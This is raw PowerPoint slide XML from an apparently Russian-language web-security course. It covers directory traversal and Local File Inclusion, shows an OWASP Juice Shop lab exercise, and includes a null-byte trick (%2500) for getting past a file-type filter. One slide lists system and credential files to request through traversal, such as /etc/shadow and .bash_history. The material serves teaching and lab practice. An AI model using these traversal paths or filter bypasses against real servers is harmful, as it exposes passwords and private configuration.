              <a:t> %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\hosts </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On Linux machines try the following. The web server root may be several directories down from the system root. Be sure to prefix the file names with directory traversal (i.e. - ../../..).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>motd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow /home/xxx/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue{,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>master.passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/group /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/hosts /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/crontab /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysctl.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syslog.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chttp.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lighttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cups/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cupsd.confcda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/exports /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auto.master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auto_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="845075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buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Перейдите по адресу http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>:3000/ftp (как в разделе Доступ к конфиденциальному документу.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>При прямом открытии http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>:3000/ftp/package.json.bak вы получите ошибку, ссылаясь на недопустимый тип файла.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Используя ядовитый нулевой байт (%00), фильтр можно обмануть, но только с изюминкой:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Доступ к http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>:3000/ftp/package.json.bak%00.md, как ни странно, не будет успешным......</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>потому что символ % должен быть также закодирован в URL (в %25) для того, чтобы позже сработать во время доступа к файловой системе.</a:t>
            </a:r>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57133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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92355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22</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057580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en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (LFI) — это возможность использования локальных файлов сервера. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе потенциально содержащим конфиденциальную информацию.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Возникает подобная уязвимость в том случае, если при реализации веб-приложения используются небезопасные функции, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, позволяющие включать контент на страницу из локального файла. В нашем случае это выглядит следующим образом:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Благодаря строчке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>include</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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> в содержимое страницы будет включаться значение GET-параметра </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Теперь, используя эту уязвимость, нам будут возвращаться локальные файлы, которые мы укажем в параметре.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Статья носит информационный характер. Не нарушайте законодательство.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Обнаружение уязвимости</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Как обнаружить уязвимость? Если указать в потенциально уязвимом параметре включение какого-то локального файла, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> с любым расширением, и этот файл откроется, то однозначно можно утверждать, что параметр отвечает за подкачку файла. Сделать это можно как вручную, так и с помощью различных автоматизированных инструментов, например, сканером уязвимостей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Wapiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, о котором говорилось в одной из наших </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>статей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, или специализированным инструментом </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>LFISuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, который разработан именно под поиск и эксплуатацию LFI-уязвимостей.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Какие здесь могут быть подводные камни? Например, наличие фильтрации, которая будет подставлять в окончание строки расширение файла, например,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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Таким образом, при попытке включения в страницу файла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etc</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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> мы получим в адресной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>file</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etc</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passwd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
